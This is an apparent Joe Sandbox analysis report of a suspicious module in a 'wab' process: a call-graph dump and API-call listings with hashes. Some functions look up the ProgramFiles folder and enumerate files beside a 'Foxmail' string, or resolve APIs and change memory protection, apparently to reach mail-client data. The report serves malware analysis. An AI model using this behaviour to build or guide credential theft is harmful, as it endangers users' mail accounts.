6936->6938 6939 221698da GetLastError 6936->6939 6940 221698f1 6937->6940 6938->6935 6938->6936 6939->6935 6940->6888 6948 22169904 6941->6948 6942 22169a0f 6943 22162ada _ValidateLocalCookies 5 API calls 6942->6943 6945 22169a1e 6943->6945 6944 22169986 WideCharToMultiByte 6946 22169a07 GetLastError 6944->6946 6947 221699bb WriteFile 6944->6947 6945->6888 6946->6942 6947->6946 6947->6948 6948->6942 6948->6944 6948->6947 6954 22169737 6949->6954 6950 221697ea 6951 22162ada _ValidateLocalCookies 5 API calls 6950->6951 6953 22169803 6951->6953 6952 221697a9 WriteFile 6952->6954 6955 221697ec GetLastError 6952->6955 6953->6888 6954->6950 6954->6952 6955->6950 6957 22166355 __dosmaperr 20 API calls 6956->6957 6958 2216633d __dosmaperr 6957->6958 6959 22166368 __dosmaperr 20 API calls 6958->6959 6960 22166350 6959->6960 6960->6892 6970 22168d52 6961->6970 6963 22169f9f 6964 22169fa7 6963->6964 6965 22169fb8 SetFilePointerEx 6963->6965 6966 22166368 __dosmaperr 20 API calls 6964->6966 6967 22169fd0 GetLastError 6965->6967 6968 22169fac 6965->6968 6966->6968 6969 22166332 __dosmaperr 20 API calls 6967->6969 6968->6865 6969->6968 6971 22168d74 6970->6971 6972 22168d5f 6970->6972 6974 22166355 __dosmaperr 20 API calls 6971->6974 6978 22168d99 6971->6978 6973 22166355 __dosmaperr 20 API calls 6972->6973 6975 22168d64 6973->6975 6976 22168da4 6974->6976 6977 22166368 __dosmaperr 20 API calls 6975->6977 6979 22166368 __dosmaperr 20 API calls 6976->6979 6980 22168d6c 6977->6980 6978->6963 6981 22168dac 6979->6981 6980->6963 6982 221662ac _abort 26 API calls 6981->6982 6982->6980 6984 22168dd6 6983->6984 6985 22168dc9 6983->6985 6987 22168de2 6984->6987 6988 22166368 __dosmaperr 20 API calls 6984->6988 6986 22166368 __dosmaperr 20 API calls 6985->6986 6989 22168dce 6986->6989 6987->6913 6990 22168e03 6988->6990 6989->6913 6991 221662ac _abort 26 API calls 6990->6991 6991->6989 6993 22165af6 _abort 38 API calls 6992->6993 6994 22167c24 6993->6994 6995 22167a00 __fassign 38 API calls 6994->6995 6996 22167c34 6995->6996 6996->6924 6997->6907 7001 2216ad24 6998->7001 7000 2216adca 7000->6823 7002 2216ad30 ___scrt_is_nonwritable_in_current_image 7001->7002 7012 22168c7b RtlEnterCriticalSection 7002->7012 7004 2216ad3e 7005 2216ad65 7004->7005 7006 2216ad70 7004->7006 7013 2216ae4d 7005->7013 7008 22166368 __dosmaperr 20 API calls 7006->7008 7009 2216ad6b 7008->7009 7028 2216ad9a 7009->7028 7011 2216ad8d _abort 7011->7000 7012->7004 7014 22168d52 26 API calls 7013->7014 7017 2216ae5d 7014->7017 7015 2216ae63 7031 22168cc1 7015->7031 7017->7015 7018 2216ae95 7017->7018 7020 22168d52 26 API calls 7017->7020 7018->7015 7021 22168d52 26 API calls 7018->7021 7024 2216ae8c 7020->7024 7022 2216aea1 CloseHandle 7021->7022 7022->7015 7025 2216aead GetLastError 7022->7025 7023 2216aedd 7023->7009 7027 22168d52 26 API calls 7024->7027 7025->7015 7026 22166332 __dosmaperr 20 API calls 7026->7023 7027->7018 7040 22168c9e RtlLeaveCriticalSection 7028->7040 7030 2216ada4 7030->7011 7032 22168d37 7031->7032 7033 22168cd0 7031->7033 7034 22166368 __dosmaperr 20 API calls 7032->7034 7033->7032 7039 22168cfa 7033->7039 7035 22168d3c 7034->7035 7036 22166355 __dosmaperr 20 API calls 7035->7036 7037 22168d27 7036->7037 7037->7023 7037->7026 7038 22168d21 SetStdHandle 7038->7037 7039->7037 7039->7038 7040->7030 7041->6796 7042->6776 7043 22162049 7045 22162055 ___scrt_is_nonwritable_in_current_image 7043->7045 7044 2216205e 7045->7044 7046 221620d3 7045->7046 7047 2216207d 7045->7047 7049 22162639 ___scrt_fastfail 4 API calls 7046->7049 7057 2216244c 7047->7057 7051 221620da 7049->7051 7050 22162082 7066 22162308 7050->7066 7053 22162087 __RTC_Initialize 7069 221620c4 7053->7069 7055 2216209f 7072 2216260b 7055->7072 7058 22162451 ___scrt_release_startup_lock 7057->7058 7059 22162455 7058->7059 7061 22162461 7058->7061 7060 2216527a _abort 20 API calls 7059->7060 7062 2216245f 7060->7062 7063 2216246e 7061->7063 7064 2216499b _abort 28 API calls 7061->7064 7062->7050 7063->7050 7065 22164bbd 7064->7065 7065->7050 7078 221634c7 RtlInterlockedFlushSList 7066->7078 7068 22162312 7068->7053 7080 2216246f 7069->7080 7071 221620c9 ___scrt_release_startup_lock 7071->7055 7073 22162617 7072->7073 7074 2216262d 7073->7074 7099 221653ed 7073->7099 7074->7044 7077 22163529 ___vcrt_uninitialize 8 API calls 7077->7074 7079 221634d7 7078->7079 7079->7068 7085 221653ff 7080->7085 7083 2216391b ___vcrt_uninitialize_ptd 6 API calls 7084 2216354d 7083->7084 7084->7071 7088 22165c2b 7085->7088 7089 22165c35 7088->7089 7090 22162476 7088->7090 7092 22165db2 7089->7092 7090->7083 7093 22165c45 _abort 5 API calls 7092->7093 7094 22165dd9 7093->7094 7095 22165de5 7094->7095 7096 22165df1 TlsFree 7094->7096 7097 22162ada _ValidateLocalCookies 5 API calls 7095->7097 7096->7095 7098 22165e02 7097->7098 7098->7090 7102 221674da 7099->7102 7104 221674f3 7102->7104 7103 22162ada _ValidateLocalCookies 5 API calls 7105 22162625 7103->7105 7104->7103 7105->7077 7106 22163370 7117 22163330 7106->7117 7118 22163342 7117->7118 7119 2216334f 7117->7119 7120 22162ada _ValidateLocalCookies 5 API calls 7118->7120 7120->7119 7121 22169e71 7122 22169e95 7121->7122 7123 22169eae 7122->7123 7125 2216ac6b __startOneArgErrorHandling 7122->7125 7126 22169ef8 7123->7126 7129 2216aa53 7123->7129 7128 2216acad __startOneArgErrorHandling 7125->7128 7139 2216b2f0 7125->7139 7130 2216aa70 RtlDecodePointer 7129->7130 7132 2216aa80 7129->7132 7130->7132 7131 2216ab0d 7135 22166368 __dosmaperr 20 API calls 7131->7135 7136 2216ab02 7131->7136 7132->7131 7132->7136 7137 2216aab7 7132->7137 7133 22162ada _ValidateLocalCookies 5 API calls 7134 2216ac67 7133->7134 7134->7126 7135->7136 7136->7133 7137->7136 7138 22166368 __dosmaperr 20 API calls 7137->7138 7138->7136 7140 2216b329 __startOneArgErrorHandling 7139->7140 7141 2216b5c1 __raise_exc RaiseException 7140->7141 7143 2216b350 __startOneArgErrorHandling 7140->7143 7141->7143 7142 2216b393 7145 2216b8b2 __startOneArgErrorHandling 20 API calls 7142->7145 7143->7142 7144 2216b36e 7143->7144 7150 2216b8e1 7144->7150 7147 2216b38e __startOneArgErrorHandling 7145->7147 7148 22162ada _ValidateLocalCookies 5 API calls 7147->7148 7149 2216b3b7 7148->7149 7149->7128 7151 2216b8f0 7150->7151 7152 2216b90f __startOneArgErrorHandling 7151->7152 7153 2216b964 __startOneArgErrorHandling 7151->7153 7155 221678a3 __startOneArgErrorHandling 5 API calls 7152->7155 7154 2216b8b2 __startOneArgErrorHandling 20 API calls 7153->7154 7158 2216b95d 7154->7158 7156 2216b950 7155->7156 7157 2216b8b2 __startOneArgErrorHandling 20 API calls 7156->7157 7156->7158 7157->7158 7158->7147 7728 22165bff 7736 22165d5c 7728->7736 7731 22165c13 7732 22165b7a _abort 20 API calls 7733 22165c1b 7732->7733 7734 22165c28 7733->7734 7735 22165c2b 11 API calls 7733->7735 7735->7731 7737 22165c45 _abort 5 API calls 7736->7737 7738 22165d83 7737->7738 7739 22165d9b TlsAlloc 7738->7739 7740 22165d8c 7738->7740 7739->7740 7741 22162ada _ValidateLocalCookies 5 API calls 7740->7741 7742 22165c09 7741->7742 7742->7731 7742->7732 7159 22166664 7160 22166675 7159->7160 7161 22162ada _ValidateLocalCookies 5 API calls 7160->7161 7162 22166701 7161->7162 7163 22167260 GetStartupInfoW 7164 22167286 7163->7164 7165 22167318 7163->7165 7164->7165 7169 22168be3 7164->7169 7167 221672af 7167->7165 7168 221672dd GetFileType 7167->7168 7168->7167 7170 22168bef ___scrt_is_nonwritable_in_current_image 7169->7170 7171 22168c13 7170->7171 7172 22168bfc 7170->7172 7182 22165671 RtlEnterCriticalSection 7171->7182 7174 22166368 __dosmaperr 20 API calls 7172->7174 7175 22168c01 7174->7175 7176 221662ac _abort 26 API calls 7175->7176 7177 22168c0b _abort 7176->7177 7177->7167 7178 22168c4b 7190 22168c72 7178->7190 7179 22168c1f 7179->7178 7183 22168b34 7179->7183 7182->7179 7184 2216637b _abort 20 API calls 7183->7184 7185 22168b46 7184->7185 7187 22165eb7 11 API calls 7185->7187 7189 22168b53 7185->7189 7186 2216571e _free 20 API calls 7188 22168ba5 7186->7188 7187->7185 7188->7179 7189->7186 7193 221656b9 RtlLeaveCriticalSection 7190->7193 7192 22168c79 7192->7177 7193->7192 7743 2216a1e0 7746 2216a1fe 7743->7746 7745 2216a1f6 7747 2216a203 7746->7747 7748 2216aa53 21 API calls 7747->7748 7750 2216a298 7747->7750 7749 2216a42f 7748->7749 7749->7745 7750->7745 7194 22166761 7195 221666e6 7194->7195 7196 2216677f 7194->7196 7198 221666f2 7195->7198 7199 221666eb FindClose 7195->7199 7202 221681a0 7196->7202 7200 22162ada _ValidateLocalCookies 5 API calls 7198->7200 7199->7198 7201 22166701 7200->7201 7203 221681d9 7202->7203 7204 221681dd 7203->7204 7215 22168205 7203->7215 7205 22166368 __dosmaperr 20 API calls 7204->7205 7207 221681e2 7205->7207 7206 22168529 7208 22162ada _ValidateLocalCookies 5 API calls 7206->7208 7209 221662ac _abort 26 API calls 7207->7209 7210 22168536 7208->7210 7211 221681ed 7209->7211 7210->7195 7212 22162ada _ValidateLocalCookies 5 API calls 7211->7212 7214 221681f9 7212->7214 7214->7195 7215->7206 7216 221680c0 7215->7216 7219 221680db 7216->7219 7217 22162ada _ValidateLocalCookies 5 API calls 7218 22168152 7217->7218 7218->7215 7219->7217 7220 22169d61 7221 22169d81 7220->7221 7224 22169db8 7221->7224 7223 22169dab 7225 22169dbf 7224->7225 7226 22169e20 7225->7226 7230 22169ddf 7225->7230 7227 2216aa17 21 API calls 7226->7227 7228 2216a90e 7226->7228 7229 22169e6e 7227->7229 7228->7223 7229->7223 7230->7228 7231 2216aa17 21 API calls 7230->7231 7232 2216a93e 7231->7232 7232->7223 7233 2216506f 7234 22165081 7233->7234 7235 22165087 7233->7235 7236 22165000 20 API calls 7234->7236 7236->7235 7751 221665ec 7756 221667bf 7751->7756 7754 2216571e _free 20 API calls 7755 221665ff 7754->7755 7761 221667f4 7756->7761 7759 2216571e _free 20 API calls 7760 221665f6 7759->7760 7760->7754 7762 22166806 7761->7762 7763 221667cd 7761->7763 7764 22166836 7762->7764 7765 2216680b 7762->7765 7763->7759 7763->7760 7764->7763 7772 221671d6 7764->7772 7766 2216637b _abort 20 API calls 7765->7766 7767 22166814 7766->7767 7769 2216571e _free 20 API calls 7767->7769 7769->7763 7770 22166851 7771 2216571e _free 20 API calls 7770->7771 7771->7763 7773 221671e1 7772->7773 7774 22167209 7773->7774 7776 221671fa 7773->7776 7775 22167218 7774->7775 7781 22168a98 7774->7781 7788 22168acb 7775->7788 7777 22166368 __dosmaperr 20 API calls 7776->7777 7780 221671ff ___scrt_fastfail 7777->7780 7780->7770 7782 22168aa3 7781->7782 7783 22168ab8 RtlSizeHeap 7781->7783 7784 22166368 __dosmaperr 20 API calls 7782->7784 7783->7775 7785 22168aa8 7784->7785 7786 221662ac _abort 26 API calls 7785->7786 7787 22168ab3 7786->7787 7787->7775 7789 22168ae3 7788->7789 7790 22168ad8 7788->7790 7792 22168aeb 7789->7792 7798 22168af4 _abort 7789->7798 7791 221656d0 21 API calls 7790->7791 7796 22168ae0 7791->7796 7793 2216571e _free 20 API calls 7792->7793 7793->7796 7794 22168b1e RtlReAllocateHeap 7794->7796 7794->7798 7795 22168af9 7797 22166368 __dosmaperr 20 API calls 7795->7797 7796->7780 7797->7796 7798->7794 7798->7795 7799 2216474f _abort 7 API calls 7798->7799 7799->7798 7237 2216ac6b 7238 2216ac84 __startOneArgErrorHandling 7237->7238 7239 2216b2f0 21 API calls 7238->7239 7240 2216acad __startOneArgErrorHandling 7238->7240 7239->7240 7800 221685eb 7803 2216853a 7800->7803 7801 2216854f 7802 22166368 __dosmaperr 20 API calls 7801->7802 7804 22168554 7801->7804 7805 2216857a 7802->7805 7803->7801 7803->7804 7807 2216858b 7803->7807 7806 221662ac _abort 26 API calls 7805->7806 7806->7804 7807->7804 7808 22166368 __dosmaperr 20 API calls 7807->7808 7808->7805

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22161137
                                                  • lstrcatW.KERNEL32(?,?), ref: 22161151
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216115C
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216116D
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216117C
                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22161193
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 221611D0
                                                  • FindClose.KERNELBASE(00000000), ref: 221611DB
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                  • String ID:
                                                  • API String ID: 1083526818-0
                                                  • Opcode ID: 386b449481a7cb7f8071ed7a9ed618410eb58ff644a8051700a42a91e30d97c0
                                                  • Instruction ID: 9b9e5d3d0e4c28455ba5565dfb65e1703682eaef7648159ff42f333f01618115
                                                  • Opcode Fuzzy Hash: 386b449481a7cb7f8071ed7a9ed618410eb58ff644a8051700a42a91e30d97c0
                                                  • Instruction Fuzzy Hash: 2D216F72A843486BD724EA659C48FAF7BDCEF84314F000D2ABA58D3190EA74D6158796
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22161434
                                                    • Part of subcall function 221610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22161137
                                                    • Part of subcall function 221610F1: lstrcatW.KERNEL32(?,?), ref: 22161151
                                                    • Part of subcall function 221610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216115C
                                                    • Part of subcall function 221610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216116D
                                                    • Part of subcall function 221610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2216117C
                                                    • Part of subcall function 221610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22161193
                                                    • Part of subcall function 221610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 221611D0
                                                    • Part of subcall function 221610F1: FindClose.KERNELBASE(00000000), ref: 221611DB
                                                  • lstrlenW.KERNEL32(?), ref: 221614C5
                                                  • lstrlenW.KERNEL32(?), ref: 221614E0
                                                  • lstrlenW.KERNEL32(?,?), ref: 2216150F
                                                  • lstrcatW.KERNEL32(00000000), ref: 22161521
                                                  • lstrlenW.KERNEL32(?,?), ref: 22161547
                                                  • lstrcatW.KERNEL32(00000000), ref: 22161553
                                                  • lstrlenW.KERNEL32(?,?), ref: 22161579
                                                  • lstrcatW.KERNEL32(00000000), ref: 22161585
                                                  • lstrlenW.KERNEL32(?,?), ref: 221615AB
                                                  • lstrcatW.KERNEL32(00000000), ref: 221615B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                  • String ID: )$Foxmail$ProgramFiles
                                                  • API String ID: 672098462-2938083778
                                                  • Opcode ID: a173ac84f4778c7a339acbedaa8be7aa40c71a3f9969f30bd60ec83455da7b88
                                                  • Instruction ID: ddab929b2f38b97a500c003f0c1d8822eaa92aaf22a576ea7b4a1d6eb25bebc1
                                                  • Opcode Fuzzy Hash: a173ac84f4778c7a339acbedaa8be7aa40c71a3f9969f30bd60ec83455da7b88
                                                  • Instruction Fuzzy Hash: 94817171A8035CA9EB20DBA5DC85FEF7379EF84710F000596F908E71A0EAB15B94CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(2216C7DD), ref: 2216C7E6
                                                  • GetModuleHandleA.KERNEL32(?,2216C7DD), ref: 2216C838
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 2216C860
                                                    • Part of subcall function 2216C803: GetProcAddress.KERNEL32(00000000,2216C7F4), ref: 2216C804
                                                    • Part of subcall function 2216C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C816
                                                    • Part of subcall function 2216C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C82A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2099061454-0
                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction ID: 62deb49d03d5d544214a5eb0895c8ed64bfdd0bd4e8d15005867db5b05e1323e
                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction Fuzzy Hash: 48010C00AC53502CAA3052B80D0CEFEAF9C9B33664B101BBAA210C6193C9A48732C3F6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 79 2216c7a7-2216c7bc 80 2216c7be-2216c7c6 79->80 81 2216c82d 79->81 80->81 83 2216c7c8-2216c7f6 call 2216c7e6 80->83 82 2216c82f-2216c833 81->82 84 2216c835-2216c83d GetModuleHandleA 82->84 85 2216c872 call 2216c877 82->85 91 2216c86c-2216c86e 83->91 92 2216c7f8 83->92 88 2216c83f-2216c847 84->88 88->88 90 2216c849-2216c84c 88->90 90->82 95 2216c84e-2216c850 90->95 93 2216c866-2216c86b 91->93 94 2216c870 91->94 96 2216c7fa-2216c7fe 92->96 97 2216c85b-2216c85e 92->97 93->91 94->90 99 2216c856-2216c85a 95->99 100 2216c852-2216c854 95->100 102 2216c865 96->102 103 2216c800-2216c80b GetProcAddress 96->103 101 2216c85f-2216c860 GetProcAddress 97->101 99->97 100->101 101->102 102->93 103->81 104 2216c80d-2216c81a VirtualProtect 103->104 105 2216c82c 104->105 106 2216c81c-2216c82a VirtualProtect 104->106 105->81 106->105
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,2216C7DD), ref: 2216C838
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 2216C860
                                                    • Part of subcall function 2216C7E6: GetModuleHandleA.KERNEL32(2216C7DD), ref: 2216C7E6
                                                    • Part of subcall function 2216C7E6: GetProcAddress.KERNEL32(00000000,2216C7F4), ref: 2216C804
                                                    • Part of subcall function 2216C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C816
                                                    • Part of subcall function 2216C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C82A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2099061454-0
                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction ID: 18085f15db2b5662b4c75ac5138fad7acf9375f6df42ab6695e0ce7ed04efff9
                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction Fuzzy Hash: 0C2102624883816EE7718BB84D0CFFE6FDD9B27264F1946B6D140CB143D5A88766C3E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 107 2216c803-2216c80b GetProcAddress 108 2216c82d 107->108 109 2216c80d-2216c81a VirtualProtect 107->109 112 2216c82f-2216c833 108->112 110 2216c82c 109->110 111 2216c81c-2216c82a VirtualProtect 109->111 110->108 111->110 113 2216c835-2216c83d GetModuleHandleA 112->113 114 2216c872 call 2216c877 112->114 116 2216c83f-2216c847 113->116 116->116 117 2216c849-2216c84c 116->117 117->112 118 2216c84e-2216c850 117->118 119 2216c856-2216c85e 118->119 120 2216c852-2216c854 118->120 121 2216c85f-2216c865 GetProcAddress 119->121 120->121 124 2216c866-2216c86e 121->124 126 2216c870 124->126 126->117
                                                  APIs
                                                  • GetProcAddress.KERNEL32(00000000,2216C7F4), ref: 2216C804
                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C816
                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2216C7F4,2216C7DD), ref: 2216C82A
                                                  • GetModuleHandleA.KERNEL32(?,2216C7DD), ref: 2216C838
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 2216C860
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 2152742572-0
                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction ID: d5a021a7880df6957cc83e39f6623bde6eaa409007160f2afa028db563a07d76
                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction Fuzzy Hash: 1AF0A9416C93403CFA7146B80D4DEFE9FCC8B37660B105A76A214C7183D8A9873683F6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 221661DA
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 221661E4
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 221661F1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3e6afe393d6c5c6c71bff5f6c5d4438bc135b675fa64368d11fbdc1b387f26f6
                                                  • Instruction ID: 05f4ff8e2fdff21161377ff219b9220e71d47874807c93fc81a6390ab4ed50fe
                                                  • Opcode Fuzzy Hash: 3e6afe393d6c5c6c71bff5f6c5d4438bc135b675fa64368d11fbdc1b387f26f6
                                                  • Instruction Fuzzy Hash: 6B31F37494132C9BCB61DF24C988BEDBBB8AF18310F5041DAE81CA7250EB749B95CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,22164A8A,?,22172238,0000000C,22164BBD,00000000,00000000,00000001,22162082,22172108,0000000C,22161F3A,?), ref: 22164AD5
                                                  • TerminateProcess.KERNEL32(00000000,?,22164A8A,?,22172238,0000000C,22164BBD,00000000,00000000,00000001,22162082,22172108,0000000C,22161F3A,?), ref: 22164ADC
                                                  • ExitProcess.KERNEL32 ref: 22164AEE
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4f81d52a5931c4268334e97bb4972fdd35d6a7a9d1001514a0d55a792ac3d6fb
                                                  • Instruction ID: 3f55cf5c7cff63bdde4a2911248f9d0f1864dea1b0e8e40c0316c4d789eb9dc8
                                                  • Opcode Fuzzy Hash: 4f81d52a5931c4268334e97bb4972fdd35d6a7a9d1001514a0d55a792ac3d6fb
                                                  • Instruction Fuzzy Hash: 40E04F35180345AFCF216F15CD09EBE3B69EF00341B104410FD0547029CB39DA52DA44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 28457c3ed1f330a4b298401fdf1899d88a8367f39f721db9830f7901b053751e
                                                  • Instruction ID: 1a6a05b8a61653897e4d1e70da9fd689869ee1e055cc8a23a0cbd863f6592287
                                                  • Opcode Fuzzy Hash: 28457c3ed1f330a4b298401fdf1899d88a8367f39f721db9830f7901b053751e
                                                  • Instruction Fuzzy Hash: D8A011303802028F83008E3A830AA0E3AECAA882C030008A8AC08C8008FB2880008A02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
